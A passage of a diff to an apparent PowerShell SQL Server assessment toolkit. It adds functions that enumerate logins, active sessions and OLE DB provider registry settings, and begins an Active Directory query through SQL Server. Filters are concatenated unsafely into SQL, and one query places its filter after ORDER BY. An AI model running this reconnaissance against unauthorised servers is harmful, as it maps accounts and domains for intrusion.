'Permission name to filter for.')] - [string]$PermissionName, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Permission type to filter for.')] - [string]$PermissionType, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Principal name for grantee to filter for.')] + HelpMessage = 'Principal name to filter for.')] [string]$PrincipalName, - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = "Don't select permissions for default databases.")] - [switch]$NoDefaults, - [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose @@ -5447,37 +6693,25 @@ Function Get-SQLDatabasePriv Begin { # Table for output - $TblDatabasePrivs = New-Object -TypeName System.Data.DataTable - - # Setup PermissionName filter - if($PermissionName) - { - $PermissionNameFilter = " and pm.permission_name like '$PermissionName'" - } - else - { - $PermissionNameFilter = '' - } + $TblLogins = New-Object -TypeName System.Data.DataTable + $null = $TblLogins.Columns.Add('ComputerName') + $null = $TblLogins.Columns.Add('Instance') + $null = $TblLogins.Columns.Add('PrincipalId') + $null = $TblLogins.Columns.Add('PrincipalName') + $null = $TblLogins.Columns.Add('PrincipalSid') + $null = $TblLogins.Columns.Add('PrincipalType') + $null = $TblLogins.Columns.Add('CreateDate') + $null = $TblLogins.Columns.Add('IsLocked') - # Setup PermissionName filter + # Setup CredentialName filter if($PrincipalName) { - $PrincipalNameFilter = " and rp.name like '$PrincipalName'" + $PrincipalNameFilter = " and name like '$PrincipalName'" } else { $PrincipalNameFilter = '' } - - # Setup PermissionType filter - if($PermissionType) - { - $PermissionTypeFilter = " and pm.class_desc like '$PermissionType'" - } - else - { - $PermissionTypeFilter = '' - } } Process @@ -5493,83 +6727,88 @@ Function Get-SQLDatabasePriv $Instance = $env:COMPUTERNAME } - # Setup NoDefault filter - if($NoDefaults) + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } } else { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return } - # Get the privs for each database - $TblDatabases | - ForEach-Object -Process { - # Set DatabaseName filter - $DbName = $_.DatabaseName + # Define Query + $Query = " USE master; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance],principal_id as [PrincipalId], + name as [PrincipalName], + sid as [PrincipalSid], + type_desc as [PrincipalType], + create_date as [CreateDate], + LOGINPROPERTY ( name , 'IsLocked' ) as [IsLocked] + FROM [sys].[server_principals] + WHERE type = 'S' or type = 'U' or type = 'C' + $PrincipalNameFilter" - # Define Query - $Query = " USE $DbName; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$DbName' as [DatabaseName], - rp.name as [PrincipalName], - rp.type_desc as [PrincipalType], - pm.class_desc as [PermissionType], - pm.permission_name as [PermissionName], - pm.state_desc as [StateDescription], - ObjectType = CASE - WHEN obj.type_desc IS NULL - OR obj.type_desc = 'SYSTEM_TABLE' THEN - pm.class_desc - ELSE - obj.type_desc - END, - [ObjectName] = Isnull(ss.name, Object_name(pm.major_id)) - FROM $DbName.sys.database_principals rp - INNER JOIN $DbName.sys.database_permissions pm - ON pm.grantee_principal_id = rp.principal_id - LEFT JOIN $DbName.sys.schemas ss - ON pm.major_id = ss.schema_id - LEFT JOIN $DbName.sys.objects obj - ON pm.[major_id] = obj.[object_id] WHERE 1=1 - $PermissionTypeFilter - $PermissionNameFilter - $PrincipalNameFilter" + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - # Execute Query - if(-not $SuppressVerbose) + # Update sid formatting for each record + $TblResults | + ForEach-Object -Process { + # Format principal sid + $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') + if ($NewSid.length -le 10) { - Write-Verbose -Message "$Instance : Grabbing permissions for the $DbName database..." + $Sid = [Convert]::ToInt32($NewSid,16) + } + else + { + $Sid = $NewSid } - $TblDatabaseTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - # Append results - $TblDatabasePrivs = $TblDatabasePrivs + $TblDatabaseTemp + # Add results to table + $null = $TblLogins.Rows.Add( + [string]$_.ComputerName, + [string]$_.Instance, + [string]$_.PrincipalId, + [string]$_.PrincipalName, + $Sid, + [string]$_.PrincipalType, + $_.CreateDate, + [string]$_.IsLocked) } } End { # Return data - $TblDatabasePrivs + $TblLogins } } + + # ---------------------------------- -# Get-SQLDatabaseUser +# Get-SQLSession # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLDatabaseUser +Function Get-SQLSession { <# .SYNOPSIS - Returns database user information from target SQL Servers. + Returns active sessions from target SQL Servers. Sysadmin privileges is required to view all sessions. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -5578,42 +6817,33 @@ Function Get-SQLDatabaseUser SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DAC - Connect using Dedicated Admin Connection. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER DatabaseUser - Database user to filter for. - .PARAMETER PrincipalName - Principal name to filter for. - .PARAMETER NoDefaults - Only show information for non default databases. - .EXAMPLE - PS C:\> Get-SQLDatabaseUser -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb -PrincipalName evil + PS C:\> Get-SQLSession -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - DatabaseUserId : 5 - DatabaseUser : evil - PrincipalSid : 3E26CA9124B4AE42ABF1BBF2523738CA - PrincipalName : evil - PrincipalType : SQL_USER - deault_schema_name : dbo - create_date : 04/22/2016 13:00:33 - is_fixed_role : False - [TRUNCATED] + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + PrincipalSid : 010500000000000515000000F3864312345716CC636051C017100000 + PrincipalName : Domain\MyUser + OriginalPrincipalName : Domain\MyUser + SessionId : 51 + SessionStartTime : 06/24/2016 09:26:21 + SessionLoginTime : 06/24/2016 09:26:21 + SessionStatus : running .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseUser -Verbose + PS C:\> Get-SQLInstanceDomain | Get-SQLSession -Verbose + .EXAMPLE + PS C:\> (Get-SQLSession -Instance SQLServer1\STANDARDDEV2014).count + 48 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, @@ -5628,25 +6858,11 @@ Function Get-SQLDatabaseUser [string]$Instance, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server database name.')] - [string]$DatabaseName, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Database user.')] - [string]$DatabaseUser, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Server login.')] + HelpMessage = 'PrincipalName.')] [string]$PrincipalName, - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Do not show database users associated with default databases.')] - [Switch]$NoDefaults, - [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose @@ -5655,43 +6871,31 @@ Function Get-SQLDatabaseUser Begin { # Table for output - $TblDatabaseUsers = New-Object -TypeName System.Data.DataTable - $null = $TblDatabaseUsers.Columns.Add('ComputerName') - $null = $TblDatabaseUsers.Columns.Add('Instance') - $null = $TblDatabaseUsers.Columns.Add('DatabaseName') - $null = $TblDatabaseUsers.Columns.Add('DatabaseUserId') - $null = $TblDatabaseUsers.Columns.Add('DatabaseUser') - $null = $TblDatabaseUsers.Columns.Add('PrincipalSid') - $null = $TblDatabaseUsers.Columns.Add('PrincipalName') - $null = $TblDatabaseUsers.Columns.Add('PrincipalType') - $null = $TblDatabaseUsers.Columns.Add('deault_schema_name') - $null = $TblDatabaseUsers.Columns.Add('create_date') - $null = $TblDatabaseUsers.Columns.Add('is_fixed_role') + $TblSessions = New-Object -TypeName System.Data.DataTable + $null = $TblSessions.Columns.Add('ComputerName') + $null = $TblSessions.Columns.Add('Instance') + $null = $TblSessions.Columns.Add('PrincipalSid') + $null = $TblSessions.Columns.Add('PrincipalName') + $null = $TblSessions.Columns.Add('OriginalPrincipalName') + $null = $TblSessions.Columns.Add('SessionId') + $null = $TblSessions.Columns.Add('SessionStartTime') + $null = $TblSessions.Columns.Add('SessionLoginTime') + $null = $TblSessions.Columns.Add('SessionStatus') # Setup PrincipalName filter if($PrincipalName) { - $PrincipalNameFilter = " and b.name like '$PrincipalName'" + $PrincipalNameFilter = " and login_name like '$PrincipalName'" } else { $PrincipalNameFilter = '' } - - # Setup DatabaseUser filter - if($DatabaseUser) - { - $DatabaseUserFilter = " and a.name like '$DatabaseUser'" - } - else - { - $DatabaseUserFilter = '' - } } Process { - # Note: Tables queried by this function typically require sysadmin or DBO privileges. + # Note: Tables queried by this function typically require sysadmin privileges to view sessions that aren't yours. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance @@ -5702,7 +6906,6 @@ Function Get-SQLDatabaseUser $Instance = $env:COMPUTERNAME } - # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' @@ -5723,105 +6926,69 @@ Function Get-SQLDatabaseUser return } - # Get list of databases - if($NoDefaults) - { - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults - } - else - { - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose - } + # Define Query + $Query = " USE master; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + security_id as [PrincipalSid], + login_name as [PrincipalName], + original_login_name as [OriginalPrincipalName], + session_id as [SessionId], + last_request_start_time as [SessionStartTime], + login_time as [SessionLoginTime], + status as [SessionStatus] + FROM [sys].[dm_exec_sessions] + ORDER BY status + $PrincipalNameFilter" - # Get the privs for each database - $TblDatabases | - ForEach-Object -Process { - # Set DatabaseName filter - $DbName = $_.DatabaseName + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - if( -not $SuppressVerbose) + # Update sid formatting for each record + $TblResults | + ForEach-Object -Process { + # Format principal sid + $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') + if ($NewSid.length -le 10) { - Write-Verbose -Message "$Instance : Grabbing database users from $DbName." + $Sid = [Convert]::ToInt32($NewSid,16) } - - # Define Query - $Query = " USE $DbName; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$DbName' as [DatabaseName], - a.principal_id as [DatabaseUserId], - a.name as [DatabaseUser], - a.sid as [PrincipalSid], - b.name as [PrincipalName], - a.type_desc as [PrincipalType], - default_schema_name, - a.create_date, - a.is_fixed_role - FROM [sys].[database_principals] a - LEFT JOIN [sys].[server_principals] b - ON a.sid = b.sid WHERE 1=1 - $DatabaseUserFilter - $PrincipalNameFilter" - - # Execute Query - $TblDatabaseUsersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - # Update sid formatting for each entry and append results - $TblDatabaseUsersTemp | - ForEach-Object -Process { - # Convert SID to string - if($_.PrincipalSid.GetType() -eq [System.DBNull]) - { - $Sid = '' - } - else - { - # Format principal sid - $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') - if ($NewSid.length -le 10) - { - $Sid = [Convert]::ToInt32($NewSid,16) - } - else - { - $Sid = $NewSid - } - } - - # Add results to table - $null = $TblDatabaseUsers.Rows.Add( - [string]$_.ComputerName, - [string]$_.Instance, - [string]$_.DatabaseName, - [string]$_.DatabaseUserId, - [string]$_.DatabaseUser, - $Sid, - [string]$_.PrincipalName, - [string]$_.PrincipalType, - [string]$_.default_schema_name, - [string]$_.create_date, - [string]$_.is_fixed_role) + else + { + $Sid = $NewSid } + + # Add results to table + $null = $TblSessions.Rows.Add( + [string]$_.ComputerName, + [string]$_.Instance, + $Sid, + [string]$_.PrincipalName, + [string]$_.OriginalPrincipalName, + [string]$_.SessionId, + [string]$_.SessionStartTime, + [string]$_.SessionLoginTime, + [string]$_.SessionStatus) } } End { # Return data - $TblDatabaseUsers + $TblSessions } } # ---------------------------------- -# Get-SQLServerRole +# Get-SQLOleDbProvder # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLServerRole +Function Get-SQLOleDbProvder { <# .SYNOPSIS - Returns SQL Server role information from target SQL Servers. + Returns a list of the providers installede on SQL Servers and their properties. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -5830,28 +6997,40 @@ Function Get-SQLServerRole SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER RolePrincipalName - Role principal name to filter for. - .PARAMETER RoleOwner - Role owner name to filter for. - .EXAMPLE - PS C:\> Get-SQLServerRole -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 + .PARAMETER Threads + Number of concurrent host threads. + PS C:\> Get-SQLOleDbProvder -Instance SQLServer1\STANDARDDEV2014 -Verbose + + ProviderName : SQLNCLI11 + ProviderDescription : SQL Server Native Client 11.0 + ProviderParseName : {397C2819-8272-4532-AD3A-FB5E43BEAA39} + AllowInProcess : 1 + DisallowAdHocAccess : 0 + DynamicParameters : 0 + IndexAsAccessPath : 0 + LevelZeroOnly : 0 + NestedQueries : 0 + NonTransactedUpdates : 0 + SqlServerLIKE : 0 + ... - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - RolePrincipalId : 2 - RolePrincipalSid : 2 - RolePrincipalName : public - RolePrincipalType : SERVER_ROLE - OwnerPrincipalId : 1 - OwnerPrincipalName : sa - is_disabled : False - is_fixed_role : False - create_date : 4/13/2009 12:59:06 PM - modify_Date : 4/13/2009 12:59:06 PM - default_database_name : .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerRole -Verbose + PS C:\> Get-SQLOleDbProvder -Instance SQLServer1\STANDARDDEV2014 -Verbose | FT -AutoSize + + ProviderName ProviderDescription ProviderParseName Allo + ------------ ------------------- ----------------- ---- + SQLOLEDB Microsoft OLE DB Provider for SQL Server {0C7FF16C-38E3-11d0-97AB-00C04FC2AD98} 0 + SQLNCLI11 SQL Server Native Client 11.0 {397C2819-8272-4532-AD3A-FB5E43BEAA39} 1 + Microsoft.ACE.OLEDB.12.0 Microsoft Office 12.0 Access Database Engine OLE DB Provider {3BE786A0-0366-4F5C-9434-25CF162E475E} 0 + Microsoft.ACE.OLEDB.15.0 Microsoft Office 15.0 Access Database Engine OLE DB Provider {3BE786A1-0366-4F5C-9434-25CF162E475E} 0 + ADsDSOObject OLE DB Provider for Microsoft Directory Services {549365d0-ec26-11cf-8310-00aa00b505db} 1 + SSISOLEDB OLE DB Provider for SQL Server Integration Services {688037C5-0B57-464B-A953-90A806CC34C2} 0 + Search.CollatorDSO Microsoft OLE DB Provider for Search {9E175B8B-F52A-11D8-B9A5-505054503030} 0 + MSDASQL Microsoft OLE DB Provider for ODBC Drivers {c8b522cb-5cf3-11ce-ade5-00aa0044773d} 1 + MSOLAP Microsoft OLE DB Provider for Analysis Services 14.0 {DBC724B0-DD86-4772-BB5A-FCC6CAB2FC1A} 1 + MSDAOSP Microsoft OLE DB Simple Provider {dfc8bdc0-e378-11d0-9b30-0080c7e9fe95} 0 ... + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLOleDbProvder -Verbose #> [CmdletBinding()] Param( @@ -5872,16 +7051,10 @@ Function Get-SQLServerRole ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, - - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Role name.')] - [string]$RolePrincipalName, - + [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = "Role owner's name.")] - [string]$RoleOwner, + HelpMessage = 'Number of threads.')] + [int]$Threads = 2, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -5890,213 +7063,345 @@ Function Get-SQLServerRole Begin { - # Setup table for output - $TblServerRoles = New-Object -TypeName System.Data.DataTable - $null = $TblServerRoles.Columns.Add('ComputerName') - $null = $TblServerRoles.Columns.Add('Instance') - $null = $TblServerRoles.Columns.Add('RolePrincipalId') - $null = $TblServerRoles.Columns.Add('RolePrincipalSid') - $null = $TblServerRoles.Columns.Add('RolePrincipalName') - $null = $TblServerRoles.Columns.Add('RolePrincipalType') - $null = $TblServerRoles.Columns.Add('OwnerPrincipalId') - $null = $TblServerRoles.Columns.Add('OwnerPrincipalName') - $null = $TblServerRoles.Columns.Add('is_disabled') - $null = $TblServerRoles.Columns.Add('is_fixed_role') - $null = $TblServerRoles.Columns.Add('create_date') - $null = $TblServerRoles.Columns.Add('modify_Date') - $null = $TblServerRoles.Columns.Add('default_database_name') + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + $TblProviders = New-Object -TypeName System.Data.DataTable + $null = $TblProviders.Columns.Add('ComputerName') + $null = $TblProviders.Columns.Add('Instance') + $null = $TblProviders.Columns.Add('ProviderName') + $null = $TblProviders.Columns.Add('ProviderDescription') + $null = $TblProviders.Columns.Add('ProviderParseName') + $null = $TblProviders.Columns.Add('AllowInProcess') + $null = $TblProviders.Columns.Add('DisallowAdHocAccess') + $null = $TblProviders.Columns.Add('DynamicParameters') + $null = $TblProviders.Columns.Add('IndexAsAccessPath') + $null = $TblProviders.Columns.Add('LevelZeroOnly') + $null = $TblProviders.Columns.Add('NestedQueries') + $null = $TblProviders.Columns.Add('NonTransactedUpdates') + $null = $TblProviders.Columns.Add('SqlServerLIKE') - # Setup owner filter - if ($RoleOwner) - { - $RoleOwnerFilter = " AND suser_name(owning_principal_id) like '$RoleOwner'" - } - else - { - $RoleOwnerFilter = '' - } + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable - # Setup role name - if ($RolePrincipalName) + + # set instance to local host by default + if(-not $Instance) { - $PrincipalNameFilter = " AND name like '$RolePrincipalName'" + $Instance = $env:COMPUTERNAME } - else + + # Ensure provided instance is processed + if($Instance) { - $PrincipalNameFilter = '' + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } } + + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance } Process { - # Note: Tables queried by this function typically require sysadmin privileges to get all rows + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + # Set instance + $Instance = $_.Instance - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) { - Write-Verbose -Message "$Instance : Connection Success." + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } } - } - else - { - if( -not $SuppressVerbose) + else { - Write-Verbose -Message "$Instance : Connection Failed." + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return } - return - } - # Define Query - $Query = "SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - principal_id as [RolePrincipalId], - sid as [RolePrincipalSid], - name as [RolePrincipalName], - type_desc as [RolePrincipalType], - owning_principal_id as [OwnerPrincipalId], - suser_name(owning_principal_id) as [OwnerPrincipalName], - is_disabled, - is_fixed_role, - create_date, - modify_Date, - default_database_name - FROM [master].[sys].[server_principals] WHERE type like 'R' - $PrincipalNameFilter - $RoleOwnerFilter" + # Check sysadmin + $IsSysadmin = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + if($IsSysadmin -eq "No") + { + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : This command requires sysadmin privileges. Exiting." + } + return + }else{ + + If (-not($SuppressVerbose)){ + Write-Verbose -Message "$Instance : You have sysadmin privileges." + Write-Verbose -Message "$Instance : Grabbing list of providers." + } + } + + # SetUp Query + $Query = " + + -- Name: Get-SQLOleDbProvider.sql + -- Description: Get a list of OLE provider along with their current settings. + -- Author: Scott Sutherland, NetSPI 2017 + + -- Get a list of providers + CREATE TABLE #Providers ([ProviderName] varchar(8000), + [ParseName] varchar(8000), + [ProviderDescription] varchar(8000)) + + INSERT INTO #Providers + EXEC xp_enum_oledb_providers + + -- Create temp table for provider information + CREATE TABLE #ProviderInformation ([ProviderName] varchar(8000), + [ProviderDescription] varchar(8000), + [ProviderParseName] varchar(8000), + [AllowInProcess] int, + [DisallowAdHocAccess] int, + [DynamicParameters] int, + [IndexAsAccessPath] int, + [LevelZeroOnly] int, + [NestedQueries] int, + [NonTransactedUpdates] int, + [SqlServerLIKE] int) + + -- Setup required variables for cursor + DECLARE @Provider_name varchar(8000); + DECLARE @Provider_parse_name varchar(8000); + DECLARE @Provider_description varchar(8000); + DECLARE @property_name varchar(8000) + DECLARE @regpath nvarchar(512) + + -- Start cursor + DECLARE MY_CURSOR1 CURSOR + FOR + SELECT * FROM #Providers + OPEN MY_CURSOR1 + FETCH NEXT FROM MY_CURSOR1 INTO @Provider_name,@Provider_parse_name,@Provider_description + WHILE @@FETCH_STATUS = 0 + + BEGIN + + -- Set the registry path + SET @regpath = N'SOFTWARE\Microsoft\MSSQLServer\Providers\' + @provider_name + + -- AllowInProcess + DECLARE @AllowInProcess int + SET @AllowInProcess = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'AllowInProcess', @AllowInProcess OUTPUT + IF @AllowInProcess IS NULL + SET @AllowInProcess = 0 + + -- DisallowAdHocAccess + DECLARE @DisallowAdHocAccess int + SET @DisallowAdHocAccess = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'DisallowAdHocAccess', @DisallowAdHocAccess OUTPUT + IF @DisallowAdHocAccess IS NULL + SET @DisallowAdHocAccess = 0 + + -- DynamicParameters + DECLARE @DynamicParameters int + SET @DynamicParameters = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'DynamicParameters', @DynamicParameters OUTPUT + IF @DynamicParameters IS NULL + SET @DynamicParameters = 0 + + -- IndexAsAccessPath + DECLARE @IndexAsAccessPath int + SET @IndexAsAccessPath = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'IndexAsAccessPath', @IndexAsAccessPath OUTPUT + IF @IndexAsAccessPath IS NULL + SET @IndexAsAccessPath = 0 + + -- LevelZeroOnly + DECLARE @LevelZeroOnly int + SET @LevelZeroOnly = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'LevelZeroOnly', @LevelZeroOnly OUTPUT + IF @LevelZeroOnly IS NULL + SET @LevelZeroOnly = 0 + + -- NestedQueries + DECLARE @NestedQueries int + SET @NestedQueries = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'NestedQueries', @NestedQueries OUTPUT + IF @NestedQueries IS NULL + SET @NestedQueries = 0 + + -- NonTransactedUpdates + DECLARE @NonTransactedUpdates int + SET @NonTransactedUpdates = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'NonTransactedUpdates', @NonTransactedUpdates OUTPUT + IF @NonTransactedUpdates IS NULL + SET @NonTransactedUpdates = 0 + + -- SqlServerLIKE + DECLARE @SqlServerLIKE int + SET @SqlServerLIKE = 0 + exec sys.xp_instance_regread N'HKEY_LOCAL_MACHINE',@regpath,'SqlServerLIKE', @SqlServerLIKE OUTPUT + IF @SqlServerLIKE IS NULL + SET @SqlServerLIKE = 0 + + -- Add the full provider record to the temp table + INSERT INTO #ProviderInformation + VALUES (@Provider_name,@Provider_description,@Provider_parse_name,@AllowInProcess,@DisallowAdHocAccess,@DynamicParameters,@IndexAsAccessPath,@LevelZeroOnly,@NestedQueries,@NonTransactedUpdates,@SqlServerLIKE); + + FETCH NEXT FROM MY_CURSOR1 INTO @Provider_name,@Provider_parse_name,@Provider_description + + END + + -- Return records + SELECT * FROM #ProviderInformation + + -- Clean up + CLOSE MY_CURSOR1 + DEALLOCATE MY_CURSOR1 + DROP TABLE #Providers + DROP TABLE #ProviderInformation" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - # Execute Query - $TblServerRolesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Append results for pipeline items + $TblResults | + ForEach-Object -Process { - # Update sid formatting for each entry - $TblServerRolesTemp | - ForEach-Object -Process { - # Format principal sid - $NewSid = [System.BitConverter]::ToString($_.RolePrincipalSid).Replace('-','') - if ($NewSid.length -le 10) - { - $Sid = [Convert]::ToInt32($NewSid,16) + # Add record to master table + $null = $TblProviders.Rows.Add( + $ComputerName, + $Instance, + $_.ProviderName, + $_.ProviderDescription, + $_.ProviderParseName, + $_.AllowInProcess, + $_.DisallowAdHocAccess, + $_.DynamicParameters, + $_.IndexAsAccessPath, + $_.LevelZeroOnly, + $_.NestedQueries, + $_.NonTransactedUpdates, + $_.SqlServerLIKE + ) } - else - { - $Sid = $NewSid - } - - # Add results to table - $null = $TblServerRoles.Rows.Add( - [string]$_.ComputerName, - [string]$_.Instance, - [string]$_.RolePrincipalId, - $Sid, - $_.RolePrincipalName, - [string]$_.RolePrincipalType, - [string]$_.OwnerPrincipalId, - [string]$_.OwnerPrincipalName, - [string]$_.is_disabled, - [string]$_.is_fixed_role, - $_.create_date, - $_.modify_Date, - [string]$_.default_database_name) } - } - End - { - # Return data - $TblServerRoles + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblProviders } } # ---------------------------------- -# Get-SQLServerRoleMember +# Get-SQLDomainObject # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLServerRoleMember +# Reference: LDAP templates are based on MSDN and PowerView by Will Schroeder (@HarmJ0y). +Function Get-SQLDomainObject { <# - .SYNOPSIS - Returns SQL Server role member information from target SQL Servers. - .PARAMETER Username - SQL Server or domain account to authenticate with. - .PARAMETER Password - SQL Server or domain account password to authenticate with. - .PARAMETER Credential - SQL Server credential. - .PARAMETER Instance - SQL Server instance to connection to. - .PARAMETER RolePrincipalName - Role principal name to filter for. - .PARAMETER PrincipalName - Principal name to filter for. - .EXAMPLE - PS C:\> Get-SQLServerRoleMember -Instance SQLServer1\STANDARDDEV2014 -PrincipalName MyUser - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - RolePrincipalId : 3 - RolePrincipalName : sysadmin - PrincipalId : 272 - PrincipalName : MyUser - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - RolePrincipalId : 6 - RolePrincipalName : setupadmin - PrincipalId : 272 - PrincipalName : MyUser - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - RolePrincipalId : 276 - RolePrincipalName : MyCustomRole - PrincipalId : 272 - PrincipalName : MyUser - .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerRoleMember -Verbose + .SYNOPSIS + Using the OLE DB ADSI provider, query Active Directory for a list of domain objects + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. + .PARAMETER Credential + SQL Server credential. + 